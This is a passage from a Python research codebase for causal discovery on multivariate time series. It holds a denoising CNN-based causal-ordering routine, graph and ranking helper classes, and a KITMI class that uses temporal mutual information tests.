pd.DataFrame(np.array(test_indep_values).reshape(-1, len(S)), columns=S, index=[0])\n # indep_array = np.array(indep_values).reshape(-1, len(S))\n indep_array = pd.DataFrame(np.array(indep_values).reshape(-1, len(S)), columns=S, index=[0])\n if test_indep_values.count(test_indep_values[0]) == len(test_indep_values):\n selected = indep_array.idxmin(axis=1).loc[0]\n if verbose:\n print(\"since all p-values are the same, we are looking at the statistics...\")\n print('indeps :' + str(indep_values))\n else:\n if verbose:\n print('test indeps :' + str(test_indep_values))\n selected = test_indep_array.idxmax(axis=1).loc[0]\n pval_init = test_indep_array[selected].loc[0]\n sig.insert(0, selected)\n\n pa[selected] = summary_names.copy()\n # pa[S[idp_init]].remove(S[idp_init])\n for name in sig:\n pa[selected].remove(name)\n selected_loc = test_indep_array.columns.get_loc(selected)\n\n c = x_train.copy()\n\n print(\"selected:\" +str(selected))\n print(\"candidate parents\" +str(pa[selected]))\n\n x_train.drop(temporal_names[selected], axis=1, inplace=True)\n y.drop(y.columns[selected_loc], axis=1, inplace=True)\n del S[selected_loc]\n\n if len(S) == 1:\n sig[0] = S[0]\n print(sig)\n\n end = time.time()\n discovery_time = end - start\n print('time causal discovery: '+str(discovery_time))\n\n print(pa)\n\n res_unit_array = pd.DataFrame(np.zeros([d, d]), columns=summary_names, index=summary_names, dtype=int)\n for k in pa.keys():\n res_unit_array[k].loc[k] = 1\n temp = pa[k]\n for i in temp:\n # if k == i:\n # res_unit_array[i].loc[i] = 1\n # else:\n if res_unit_array[i].loc[k] == 0:\n res_unit_array[i].loc[k] = 1\n res_unit_array[k].loc[i] = 2\n\n return res_unit_array\n\n\n\n\n# Function to produce noise\ndef add_noise_nbcb_k(x, d, order, beta=0.5):\n x = x.copy()\n rand = np.random.randint(0, high=d, size=x.shape[0])\n for j in range(x.shape[0]):\n proba = np.random.random(size=1)\n if proba > beta:\n # for o in range(order-1):\n o = order-1\n i = rand[j] + o*d\n x[j, i] = 0\n return x\n\nclass tsCNN_nbcb_k(nn.Module):\n def __init__(self, input_size, output_size, input_lag):\n super(tsCNN_nbcb_k, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.input_lag = input_lag\n self.compact_ts = nn.Linear(input_lag, input_lag)\n self.compact_in = nn.Linear(int(input_size), input_size)\n # self.compact_in = nn.Linear(4, 2)\n self.conv1 = nn.Sequential(\n nn.Conv1d(\n in_channels=input_size,\n out_channels=input_size, # Some random number\n kernel_size=5,\n stride=1,\n padding=2,\n ),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=2), # size after pooling?\n )\n self.out = nn.Linear(input_size, output_size)\n\n def forward(self, x_dict):\n compact_ts_dict = dict()\n names = list(x_dict.keys())\n for name in names:\n x = x_dict[name].view(-1, self.input_lag)\n compact_ts_i = self.compact_ts(x)\n compact_ts_dict[name] = compact_ts_i\n if name == names[0]:\n compact_ts = compact_ts_i\n else:\n compact_ts = torch.cat((compact_ts, compact_ts_i), 1)\n compact_in = self.compact_in(compact_ts)\n x = compact_in.view(-1, self.input_size, 1)\n x = self.conv1(x)\n x = x.view(-1, self.input_size)\n output = self.out(x)\n return output, compact_in, compact_ts_dict\n\n\ndef nbcb_k(data, max_lag, learning_rate, training_epoch, noise=True, alpha=0.05, cond_ind_test=\"ParCorr\",\n verbose=True):\n \"\"\"\n :param data: input\n :param max_lag: max_lag\n :param learning_rate: learning rate of the autoencoder\n :param training_epoch: number of training epochs\n :param num_neurons: number of neurones in the hidden layer\n :param noise: boolean value, if true a denoising autoencoder should be use\n :param alpha:\n :param cond_ind_test: CMI or ParCorr\n :param verbose:\n :return: dict\n \"\"\"\n # Start Causal ordering\n start = time.time()\n\n d = data.shape[1]\n\n x = mts_order(data, order=max_lag) # [:-order]\n # names_x = x.columns[:-d]\n names_x = x.columns\n names_y = x.columns[-d:]\n y = x[names_y]\n x = x[names_x]\n\n summary_names = list(data.columns)\n temporal_names = dict()\n for s in range(d):\n temporal_names[summary_names[s]] = []\n for o in range(max_lag):\n i = s + o * d\n temporal_names[summary_names[s]].append(names_x[i])\n cost_history = []\n indep_history = []\n test_indep_history = []\n\n x_train = x.copy()\n\n S = list(data.columns)\n sig = []\n pa = dict()\n for name in summary_names:\n pa[name] = []\n\n for j in range(d-1):\n criterion = nn.MSELoss()\n model = tsCNN(x_train.shape[1], y.shape[1], max_lag).to(device)\n optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n n_epochs_stop = 100\n epochs_no_improve = 0\n min_loss = np.inf\n for iter in range(training_epoch + 1):\n if noise:\n x_train_n = add_noise_nbcb_k(x_train.values, d=len(S), order=max_lag)\n else:\n x_train_n = x_train.values.copy()\n x_train_n = pd.DataFrame(x_train_n, columns=x_train.columns)\n\n input_dict = dict()\n for i in range(int(x_train_n.shape[1]/(max_lag))):\n input_tensor = torch.tensor(\n x_train_n[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float,\n device=device)\n input_dict[S[i]] = input_tensor\n target_tensor = torch.tensor(\n y.values.reshape(-1, y.shape[1]), dtype=torch.float,\n device=device)\n\n loss = train(input_dict, target_tensor, model, optimizer, criterion)\n if loss < min_loss:\n min_loss = loss\n epochs_no_improve = 0\n else:\n epochs_no_improve = epochs_no_improve + 1\n if iter > 100 and epochs_no_improve == n_epochs_stop:\n if verbose:\n print('Early stopping!')\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n break\n\n if verbose:\n if iter % 250 == 0:\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n\n # loss = train(input_dict, target_tensor, model, optimizer, criterion)\n # if verbose:\n # if iter % 100 == 0:\n # print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n cost_history.append(loss)\n\n test_indep_values = []\n indep_values = []\n # k = d - 1 - j\n for s in range(len(S)):\n c = x_train.copy()\n input_dict = dict()\n list_other = []\n for i in range(int(c.shape[1] / (max_lag))):\n if i == s:\n print(temporal_names[S[i]][-1])\n print(c[temporal_names[S[i]]])\n c[temporal_names[S[i]][-1]] = np.zeros((c.shape[0]))\n # c[temporal_names[S[i]]][temporal_names[S[i]]] = np.zeros((len(temporal_names[S[i]])))\n print(c[temporal_names[S[i]]])\n input_tensor = torch.tensor(c[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float, device=device)\n input_dict[S[i]] = input_tensor\n else:\n list_other.append(i)\n input_tensor = torch.tensor(c[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float, device=device)\n input_dict[S[i]] = input_tensor\n\n res, compact_res, compact_ts_dict = predict(input_dict, model)\n res = res.detach().numpy()\n compact_res = compact_res.detach().numpy()\n e = y.values[:, s] - res[:, s]\n if cond_ind_test == \"ParCorr\":\n hs = TestParCorr()\n elif cond_ind_test == \"CMI\":\n hs = TestMI()\n\n # other = c[temporal_names[S[list_other[0]]]]\n other = compact_ts_dict[S[list_other[0]]].detach().numpy()\n cond = compact_ts_dict[S[s]].detach().numpy()\n\n pval, val = hs.fit(other, e, cond)\n # pval, val = hs.fit(compact_res, e)\n test_indep_values.append(pval)\n indep_values.append(abs(val))\n # indep_values.append(hs.fit(compact_res.detach().numpy(), e))\n indep_history.append(indep_values)\n test_indep_history.append(test_indep_values)\n # test_indep_array = np.array(test_indep_values).reshape(-1, len(S))\n test_indep_array = pd.DataFrame(np.array(test_indep_values).reshape(-1, len(S)), columns=S, index=[0])\n # indep_array = np.array(indep_values).reshape(-1, len(S))\n indep_array = pd.DataFrame(np.array(indep_values).reshape(-1, len(S)), columns=S, index=[0])\n if test_indep_values.count(test_indep_values[0]) == len(test_indep_values):\n selected = indep_array.idxmin(axis=1).loc[0]\n if verbose:\n print(\"since all p-values are the same, we are looking at the statistics...\")\n print('indeps :' + str(indep_values))\n else:\n if verbose:\n print('test indeps :' + str(test_indep_values))\n selected = test_indep_array.idxmax(axis=1).loc[0]\n sig.insert(0, selected)\n\n pa[selected] = summary_names.copy()\n # pa[S[idp_init]].remove(S[idp_init])\n for name in sig:\n pa[selected].remove(name)\n selected_loc = test_indep_array.columns.get_loc(selected)\n\n c = x_train.copy()\n\n print(\"selected:\" +str(selected))\n print(\"candidate parents\" +str(pa[selected]))\n\n x_train.drop(temporal_names[selected], axis=1, inplace=True)\n y.drop(y.columns[selected_loc], axis=1, inplace=True)\n del S[selected_loc]\n\n if len(S) == 1:\n sig[0] = S[0]\n print(sig)\n\n end = time.time()\n discovery_time = end - start\n print('time causal discovery: '+str(discovery_time))\n\n print(pa)\n\n res_unit_array = pd.DataFrame(np.zeros([d, d]), columns=summary_names, index=summary_names, dtype=int)\n for k in pa.keys():\n res_unit_array[k].loc[k] = 1\n temp = pa[k]\n for i in temp:\n # if k == i:\n # res_unit_array[i].loc[i] = 1\n # else:\n if res_unit_array[i].loc[k] == 0:\n res_unit_array[i].loc[k] = 1\n res_unit_array[k].loc[i] = 2\n\n return res_unit_array\n\n\nclass Graph:\n \"\"\"\n Graph structure\n 0: no edge\n 1: a tail -\n 2: arrow head ->\n \"\"\"\n def __init__(self, d):\n \"\"\"\n :param d: number of nodes\n \"\"\"\n self.d = d\n # self.edges = np.subtract(np.ones([n, n]), np.eye(n))\n self.edges = np.ones([d, d])\n self.sep = np.zeros([d, d, d])\n\n def del_edge(self, p, q):\n \"\"\"\n :param p: index of a time series\n :param q: index of a time series\n \"\"\"\n self.edges[p, q] = 0\n self.edges[q, p] = 0\n\n def add_sep(self, p, q, r):\n \"\"\"\n :param p: index of a time series\n :param q: index of a time series\n :param r: index of seperation set\n \"\"\"\n self.sep[p, q, r] = 1\n self.sep[q, p, r] = 1\n\n def search_adj(self, p):\n \"\"\"\n :param p: index of a time series\n :return: list of adjacencies of time series p and the number of adjacencies\n \"\"\"\n adj_1 = np.argwhere(self.edges[p, :] != 0)\n adj_2 = np.argwhere(self.edges[:, p] != 0)\n adj = np.intersect1d(adj_1, adj_2)\n if self.edges[p, p] == 1:\n adj = adj[adj != p]\n num_adj = len(adj)\n return adj, num_adj\n\n def search_adj_all(self):\n \"\"\"\n :return: list of adjacencies of all time series and the number of adjacencies per time series\n \"\"\"\n l_num_adj = []\n l_adj = []\n for p in range(self.d):\n adj, num_adj = self.search_adj(p)\n l_adj.append(adj.tolist())\n l_num_adj.append(num_adj)\n return l_adj, l_num_adj\n\n\nclass RankingList:\n def __init__(self):\n self.val = np.array([])\n self.elem_p = np.array([], dtype='int')\n self.elem_q = np.array([], dtype='int')\n self.elem_r = []\n\n def add(self, p, q, val, r):\n \"\"\"\n :param p: index of a time series\n :param q: index of a time series\n :param val: value of mutual information\n :param r: index of set of conditionals\n \"\"\"\n self.val = np.append(self.val, val)\n self.elem_p = np.append(self.elem_p, p)\n self.elem_q = np.append(self.elem_q, q)\n self.elem_r.append(r)\n\n def sort(self, descending=True):\n \"\"\"\n :param descending: (bool) sort ascending vs. descending. By default True\n \"\"\"\n idx = np.argsort(self.val)\n if descending:\n idx = np.flip(idx)\n # self.val = self.val[idx]\n # self.elem_p = self.elem_p[idx]\n # self.elem_q = self.elem_q[idx]\n # self.elem_r = self.elem_r[idx]\n self.val = np.take_along_axis(self.val, idx, axis=0)\n self.elem_p = np.take_along_axis(self.elem_p, idx, axis=0)\n self.elem_q = np.take_along_axis(self.elem_q, idx, axis=0)\n sorted_elem_r = []\n for i in idx:\n sorted_elem_r.append(self.elem_r[i])\n self.elem_r = sorted_elem_r\n\n\nclass KITMI:\n def __init__(self, series, sig_lev=0.05, lag_max=5, p_value=True, rank_using_p_value=False, verbose=True, num_processor=-1,\n graphical_optimization=True):\n \"\"\"\n Causal inference (Wrapper) using TMI and CTMI (contain functions for skeleton construction)\n :param series: d-time series (with possibility of different sampling rate)\n :param sig_lev: significance level. By default 0.05\n :param p_value: Use p_value for decision making. By default True\n :param verbose: Print results. By default: True\n :param num_processor: number of processors for parallelization. By default -1 (all)\n \"\"\"\n self.series = series\n self.graph = Graph(series.shape[1])\n\n training_epoch = 1000\n noise = True # d*(order-1)*2\n learning_rate = 0.01\n for i in range(series.shape[1]):\n for j in range(i+1, series.shape[1]):\n data_pair = series[[series.columns[i], series.columns[j]]]\n res_order_pair = tskiko_mv(data_pair, lag_max, learning_rate, training_epoch, noise, sig_lev, \"ParCorr\", verbose)\n if res_order_pair[series.columns[j]].loc[series.columns[i]] == 2:\n self.graph.edges[i, j] = 2\n if res_order_pair[series.columns[i]].loc[series.columns[j]] == 2:\n self.graph.edges[j, i] = 2\n # self.graph.edges = tskiko_mv(self.series[[series.columns[0], series.columns[1]]], lag_max, learning_rate, training_epoch, noise, sig_lev, \"ParCorr\", verbose)\n\n if verbose:\n print(\"Order\")\n print(self.graph.edges)\n\n\n self.series = series\n # # self.graph = Graph(series.shape[1])\n self.n = series.shape[0]\n self.d = series.shape[1]\n self.names = self.series.columns\n self.num_processor = num_processor\n self.p_value = p_value\n self.verbose = verbose\n self.sig_lev = sig_lev\n\n self.adaptive_window = True\n self.graphical_optimization = graphical_optimization\n if self.p_value == rank_using_p_value:\n self.rank_using_p_value = rank_using_p_value\n elif not rank_using_p_value:\n self.rank_using_p_value = rank_using_p_value\n else:\n print(\"Warning: rank_using_p_value can be True iff p_value is True. Using rank_using_p_value=False\")\n self.rank_using_p_value = False\n\n self.data_dict = dict()\n self.instantaneous_dict = dict()\n\n self.lags = []\n self.sampling_rate = dict()\n for col in range(series.shape[1]):\n _, s_r = get_sampling_rate(self.series[self.names[col]])\n self.sampling_rate[self.names[col]] = s_r\n\n self.alpha = get_alpha(series)\n\n for col in range(series.shape[1]):\n # self.lags.append(window_size(series[series.columns[col]], alpha=self.alpha, lag_max=lag_max))\n if not self.adaptive_window:\n self.lags.append(1)\n self.data_dict[self.names[col]] = window_representation(self.series[self.names[col]],\n windows_size=self.lags[col])\n self.instantaneous_dict[self.names[col]] = True\n\n if self.adaptive_window:\n self.gamma_matrix, self.window_matrix = self.gamma_matrix_window_matrix(self.series, series.columns)\n else:\n self.gamma_matrix = align_matrix(self.data_dict, series.columns, self.sampling_rate)\n\n self.cap_gamma_df = pd.DataFrame(columns=[\"p\", \"q\", \"r\", \"Grp\", \"Grq\"])\n\n self.mi_array = np.ones([self.graph.d, self.graph.d])\n self.cmi_array = np.ones([self.graph.d, self.graph.d])\n\n if self.verbose:\n print(\"n: \"+str(self.n))\n print(\"d: \"+str(self.d))\n print(\"names: \"+str(self.names))\n print(\"sampling_rate: \"+str(self.sampling_rate))\n print(\"significance level:\"+str(self.sig_lev))\n print(\"alpha:\"+str(self.alpha))\n print(\"window size:\"+str(self.lags))\n print(\"gamma matrix:\"+str(self.gamma_matrix))\n if self.adaptive_window:\n print(\"window matrix\"+str(self.window_matrix))\n print(\"instantaneous dict :\"+str(self.instantaneous_dict))\n print(\"Orderrrr\")\n print(self.graph.edges)\n\n def find_gamma_lambda_x_y(self, x, y, k=10, max_gamma=5):\n gamma_list = list(range(1, max_gamma))\n # todo add windows\n # ws_x_list = list(range(1, max_gamma - 2))\n # ws_y_list = list(range(1, max_gamma - 2))\n ws_x_list = [1]\n ws_y_list = [1]\n\n c = np.zeros([len(gamma_list), len(ws_x_list), len(ws_y_list)])\n\n for idx_g in range(len(gamma_list)):\n for idx_ws_x in range(len(ws_x_list)):\n x_w_rep = window_representation(x, windows_size=ws_x_list[idx_ws_x])\n for idx_ws_y in range(len(ws_y_list)):\n # if ws_x_list[idx_ws_x] == ws_y_list[idx_ws_y] == 1:\n y_w_rep = window_representation(y, windows_size=ws_y_list[idx_ws_y])\n g = gamma_list[idx_g]\n\n if g > 0:\n y_w_rep = y_w_rep[g:]\n x_w_rep = x_w_rep.reset_index(drop=True)\n y_w_rep = y_w_rep.reset_index(drop=True)\n\n x_w_rep = x_w_rep[:-g]\n x_w_rep = x_w_rep.reset_index(drop=True)\n y_w_rep = y_w_rep.reset_index(drop=True)\n m = min(x_w_rep.shape[0], y_w_rep.shape[0])\n x_w_rep = x_w_rep[:m]\n y_w_rep = y_w_rep[:m]\n if len(x_w_rep.shape) == 1:\n x_w_rep = x_w_rep.to_frame()\n if len(y_w_rep.shape) == 1:\n y_w_rep = y_w_rep.to_frame()\n cmi = TestMI(p_value=False)\n _, val = cmi.fit(x_w_rep, y_w_rep)\n\n c[idx_g, idx_ws_x, idx_ws_y] = val\n # else:\n # if ws_x_list[idx_ws_x] != ws_y_list[idx_ws_y]:\n # y_w_rep = window_representation(y, windows_size=ws_y_list[idx_ws_y])\n # g = gamma_list[idx_g]\n # _, val = tmi(x_w_rep, y_w_rep, sampling_rate_tuple, k=k, gamma=g, p_value=False)\n # c[idx_g, idx_ws_x, idx_ws_y] = val\n # else:\n # c[idx_g, idx_ws_x, idx_ws_y] = 0\n\n idx_g, idx_ws_x, idx_ws_y = np.where(c == np.max(c))\n idx_g = idx_g[0]\n idx_ws_x = idx_ws_x[0]\n idx_ws_y = idx_ws_y[0]\n g = gamma_list[idx_g]\n ws_x = ws_x_list[idx_ws_x]\n ws_y = ws_y_list[idx_ws_y]\n return g, ws_x, ws_y\n\n def gamma_matrix_window_matrix(self, series, keys, k=10, max_gamma=5):\n d = len(keys)\n g_matrix = np.zeros([d, d], dtype=int)\n window_matrix = np.zeros([d, d], dtype=list)\n\n for i in range(d):\n for j in range(d):\n if i != j:\n x = series[keys[i]]\n y = series[keys[j]]\n g, ws_x, ws_y = self.find_gamma_lambda_x_y(x, y, k=k, max_gamma=max_gamma)\n g_matrix[i, j] = g\n window_matrix[i, j] = [ws_x, ws_y]\n # window_matrix[j, i] = ws_y\n else:\n g_matrix[i, j] = 1\n window_matrix[i, j] = [1, 1]\n # window_matrix[j, i] = 1\n return pd.DataFrame(g_matrix, columns=keys, index=keys), pd.DataFrame(window_matrix, columns=keys, index=keys)\n\n def align_pq(self, x, y, gamma):\n x = x.loc[y.index[0]:]\n\n idx_x = x.index\n idx_y = y.index\n if gamma > 0:\n y = y[gamma:]\n idx_y = idx_y[gamma:]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n idx_x = idx_x[x.index]\n idx_y = idx_y[y.index]\n\n x = x[:-gamma]\n idx_x = idx_x[:-gamma]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n else:\n print(\"Error: gamma <= 0\")\n exit(0)\n\n m = min(x.shape[0], y.shape[0])\n x = x[:m]\n y = y[:m]\n idx_x = idx_x[:m]\n idx_y = idx_y[:m]\n\n if len(x.shape) == 1:\n x = x.to_frame()\n if len(y.shape) == 1:\n y = y.to_frame()\n return x, y, idx_x, idx_y\n\n def find_gamma_z_xy_util(self, x, y, z, k, Gamma, sig_samples=10000, measure=\"cmiknn\"):\n if Gamma > 0:\n x = x[Gamma:]\n y = y[Gamma:]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n z = z.reset_index(drop=True)\n\n z = z[:-Gamma]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n z = z.reset_index(drop=True)\n else:\n print(\"Error: Gamma <= 0\")\n exit(0)\n\n m = min(x.shape[0], y.shape[0], z.shape[0])\n x = x[:m]\n y = y[:m]\n z = z[:m]\n\n if len(x.shape) == 1:\n x = x.to_frame()\n if len(y.shape) == 1:\n y = y.to_frame()\n if len(z.shape) == 1:\n z = z.to_frame()\n\n cmi = TestMI(p_value=False)\n _, cmi_val = cmi.fit(x, y, z)\n return cmi_val\n\n def find_gamma_z_xy(self, x, y, z, k, max_gamma=5, measure=\"cmiknn\"):\n z = z.loc[y.index[0]:]\n\n c1 = list()\n\n c1.append(1)\n for G in range(1, max_gamma):\n val = self.find_gamma_z_xy_util(x, y, z, k=k, Gamma=G, measure=measure)\n c1.append(val)\n\n G = np.argmin(c1) + 1\n return G\n\n def align_pqr(self, v_p, v_q, idx_q, r, k):\n\n names_r = [*r.keys()]\n v_r = dict()\n nr_visted = []\n\n for nr in names_r:\n # idx_pq = idx_q\n\n v_p_new = v_p.copy()\n v_q_new = v_q.copy()\n v_p_new.index = idx_q\n v_q_new.index = idx_q\n g = self.find_gamma_z_xy(v_p_new, v_q_new, r[nr], k, max_gamma=5, measure=\"cmiknn\")\n print(\"Gamma = \" + str(g))\n # nr_processed = r[nr]\n\n # xyz_dict = {name_q: v_p_new, nr: nr_processed}\n # xyz_dict[name_q].index = idx_pq\n\n bool_idx = pd.DataFrame([False] * len(idx_q), columns=['bool'])\n bool_idx.index = idx_q\n\n v_q, r_processed, idx_q, _ = self.align_pq(v_q_new, r[nr], g)\n bool_idx.loc[idx_q] = True\n bool_idx = bool_idx['bool'].values\n v_p = v_p[bool_idx]\n # idx_p = idx_p[bool_idx]\n\n for nr_v in nr_visted:\n v_r[nr_v] = v_r[nr_v][bool_idx]\n v_r[nr] = r_processed\n nr_visted.append(nr)\n\n v_p = v_p.reset_index(drop=True)\n v_q = v_q.reset_index(drop=True)\n for nr_v in nr_visted:\n v_r[nr_v] = v_r[nr_v].reset_index(drop=True)\n\n return v_p, v_q, v_r\n\n def causation_entropy(self, p, q, r_list=[], k=10):\n gamma = self.gamma_matrix[self.names[q]].loc[self.names[p]]\n pt_1 = self.series[self.names[p]].copy()\n qt = self.series[self.names[q]].copy()\n pt_1, qt, idx_p, idx_q = self.align_pq(pt_1, qt, gamma)\n\n # qt = q.iloc[1:].values\n # pt_1 = p.iloc[:-1].values\n if len(r_list) > 0:\n # rt_1 = r.iloc[:-1].values\n r_1_dict = dict()\n for r_i in r_list:\n r_1_dict[self.names[r_i]] = self.series[self.names[r_i]].copy()\n pt_1, qt, r_1_dict = self.align_pqr(pt_1, qt, idx_q, r_1_dict, k)\n\n # Dict to df\n rt_1 = pd.DataFrame()\n for name in r_1_dict.keys():\n if isinstance(r_1_dict[name], pd.Series):\n r_1_dict[name] = r_1_dict[name].to_frame()\n rt_1[r_1_dict[name].columns] = r_1_dict[name].reset_index(drop=True)\n rt_1 = rt_1.values\n else:\n rt_1 = None\n\n qt = qt.values\n pt_1 = pt_1.values\n\n cmi = TestMI()\n pval, val = cmi.fit(qt, pt_1, rt_1)\n return pval\n\n def causation_entropy_simple(self, p, q, r_list=[], k=10):\n pt_1 = self.series[self.names[p]].copy()\n qt = self.series[self.names[q]].copy()\n\n qt = qt.iloc[1:].values\n pt_1 = pt_1.iloc[:-1].values\n if len(r_list) > 0:\n rt_1 = self.series[self.names[r_list]].copy()\n rt_1 = rt_1.iloc[:-1].values\n\n else:\n rt_1 = None\n\n cmi = TestMI()\n # cmi = TestParCorr()\n pval, val = cmi.fit(qt, pt_1, rt_1)\n return pval\n\n def progressive_removal_of_non_causal_nodes(self):\n if self.verbose:\n print(\"######################################\")\n print(\"Progressive Removal of Non-Causal Nodes\")\n print(\"######################################\")\n\n parents = dict()\n for q in range(self.d):\n parents[self.names[q]] = []\n for p in range(self.d):\n if p != q:\n if self.graph.edges[p, q] == 2:\n parents[self.names[q]].append(self.names[p])\n else:\n parents[self.names[q]].append(self.names[q])\n print(parents)\n\n for q in range(self.d):\n name_q = self.series.columns[q]\n # series_q = self.series[name_q]\n parents_q = parents[name_q].copy()\n for name_p in parents_q:\n p = self.names.tolist().index(name_p)\n parents_q_without_p = list(set(parents[self.series.columns[q]]) - {name_p})\n r_list = []\n for par_name in parents_q_without_p:\n r_list.append(self.names.tolist().index(par_name))\n # series_p = self.series[name_p]\n # series_cond = self.series[parents_q_without_p]\n print(name_p, name_q)\n pval = self.causation_entropy_simple(p, q, r_list)\n if self.verbose:\n print('CE('+name_p+'->'+name_q+'|'+str(parents_q_without_p)+') = '+str(pval))\n if pval > self.sig_lev:\n if self.verbose:\n print('Remove '+name_p+' from parents of '+name_q)\n parents[self.series.columns[q]].remove(name_p)\n self.graph.edges[p, q] = 0\n self.graph.edges[q, p] = 0\n\n\n def fit(self):\n \"\"\"\n run KITMI\n :return: graph (CPDAG)\n \"\"\"\n if self.verbose:\n now = datetime.now()\n print(\"#######################################\")\n print(\"########### Starting KITMI ###########\")\n print(\"########### \" + now.strftime(\"%H:%M:%S\" + \" ###########\"))\n print(\"#######################################\")\n\n # Progressive Removal of Non-Causal Nodes\n self.progressive_removal_of_non_causal_nodes()\n\n if self.verbose:\n print(\"######################################\")\n print(\"Final Results (KITMI)\")\n print(\"######################################\")\n print(\"Summary Graph:\")\n print(self.graph.edges)\n return self.graph.edges\n\n\n def _mi_pq(self, p, q):\n \"\"\"\n estimate tmi between two time series\n :param p: time series with index p\n :param q: time series with index q\n :return: p, q and the estimated value of tmi(p,q)\n \"\"\"\n if self.adaptive_window:\n x = window_representation(self.series[self.names[p]], windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n y = window_representation(self.series[self.names[q]], windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n print(\"Nodes and windows:\")\n print(self.names[p], self.window_matrix[self.names[q]].loc[self.names[p]])\n print(self.names[q], self.window_matrix[self.names[p]].loc[self.names[q]])\n else:\n x = self.data_dict[self.names[p]]\n y = self.data_dict[self.names[q]]\n\n mi_pval, mi_val = tmi(x, y, sampling_rate_tuple=(self.sampling_rate[self.names[p]],\n self.sampling_rate[self.names[q]]),\n gamma=self.gamma_matrix[self.names[q]].loc[self.names[p]], p_value=self.p_value)\n # mi_pval, mi_val = ctmi(x, y, None, self.names[p], self.names[q], self.sampling_rate,\n # gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value)\n return p, q, mi_pval\n\n def skeleton_initialize(self):\n \"\"\"\n initialize graph, remove all unconditional independencies and rank neighbors\n \"\"\"\n if self.verbose:\n print(\"######################################\")\n print(\"Skeletion Initialization\")\n print(\"######################################\")\n\n # p_list, q_list = np.where(np.triu(self.graph.edges) > 0)\n p_list, q_list = np.where((np.triu(self.graph.edges)-np.diag(np.diag(self.graph.edges))) == 2)\n print(self.graph.edges)\n print(np.triu(self.graph.edges)-np.diag(np.diag(self.graph.edges)))\n print(p_list, q_list)\n res = Parallel(n_jobs=self.num_processor)(delayed(self._mi_pq)(p, q) for p, q in zip(p_list, q_list))\n\n for pq in range(len(res)):\n p, q, mi = res[pq][0], res[pq][1], res[pq][2]\n self.mi_array[p, q] = mi\n self.mi_array[q, p] = mi\n if self.verbose:\n print(\"p=\" + str(p) + \"; q=\" + str(q) + \"; I(p,q)=\" + \"{: 0.5f}\".format(self.mi_array[p, q]), end=\" \")\n if self.p_value:\n test = self.mi_array[p, q] > self.sig_lev\n else:\n test = self.mi_array[p, q] < self.alpha\n if test:\n if self.verbose:\n print(\"=> Remove link between \"+str(p)+\" and \"+str(q))\n self.graph.edges[p, q] = 0\n self.graph.edges[q, p] = 0\n else:\n if self.verbose:\n print()\n\n def _cmi_sep_set_pq(self, p, q, set_size):\n \"\"\"\n estimate ctmi between two time series conditioned on each set of neighbors with cardinality equal to set_size\n :param p: time series with index p\n :param q: time series with index q\n :param set_size: cardinality of the set of neighbors\n :return: p, q, list if estimated value of ctmi(p,q,r_set), and list of all r_sets\n \"\"\"\n v_list = []\n r_list = [r for r in range(self.graph.d) if (r != p) and (r != q) and ((\n (self.graph.edges[r, p] == 2) and (self.gamma_matrix[self.names[p]].loc[self.names[r]] >= 0)) or (\n (self.graph.edges[r, q] == 2) and (self.gamma_matrix[self.names[q]].loc[self.names[r]] >= 0)))]\n\n r_list = [list(r) for r in itertools.combinations(r_list, set_size)]\n\n r_list_temp = r_list.copy()\n # if set_size == 1:\n for rs in r_list_temp:\n print(rs)\n print(all(elem >= self.d for elem in rs))\n if all(elem >= self.d for elem in rs):\n r_list.remove(rs)\n del r_list_temp\n\n if self.adaptive_window:\n x = window_representation(self.series[self.names[p]], windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n y = window_representation(self.series[self.names[q]], windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n else:\n x = self.data_dict[self.names[p]]\n y = self.data_dict[self.names[q]]\n\n for rs in r_list:\n z = dict()\n for r in rs:\n if self.adaptive_window:\n # select and drop NA\n z[self.names[r]] = self.series[self.names[r]].dropna()\n else:\n z[self.names[r]] = self.data_dict[self.names[r]]\n if self.graphical_optimization:\n # cmi_pval, cmi_val = gctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n # gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value,\n # graph=self.graph.edges)\n cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, graph=self.graph.edges,\n p_value=self.rank_using_p_value, instantaneous_dict=self.instantaneous_dict)\n else:\n cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value,\n instantaneous_dict=self.instantaneous_dict)\n\n if self.rank_using_p_value:\n v_list.append(cmi_pval)\n else:\n v_list.append(cmi_val)\n if v_list:\n return p, q, v_list, r_list\n\n def rank_cmi_sep_set_parallel(self, set_size):\n \"\"\"\n rank pairs of time series based on the estimation of ctmi between each pair of connected time series\n :param set_size: cardinality of the set of neighbors\n :return: ranking of each pair of connected time series based ctmi\n \"\"\"\n list_adj, list_num_adj = self.graph.search_adj_all()\n p_list = [p for p in range(len(list_num_adj)) if list_num_adj[p] > set_size]\n print(p_list)\n q_list = [list_adj[p] for p in p_list]\n p_list = [p_list[p] for p in range(len(p_list)) for _ in q_list[p]]\n q_list = [q for sublist in q_list for q in sublist]\n pq_list = [(p, q) for p, q in zip(p_list, q_list)]\n temp_pq = pq_list.copy()\n temp_p = p_list.copy()\n temp_q = q_list.copy()\n for pq in range(len(temp_pq)):\n if (temp_pq[pq][1], temp_pq[pq][0]) in pq_list:\n pq_list.remove((temp_pq[pq][0], temp_pq[pq][1]))\n p_list.remove(temp_p[pq])\n q_list.remove(temp_q[pq])\n del temp_pq, temp_p, temp_q\n print(list_adj, 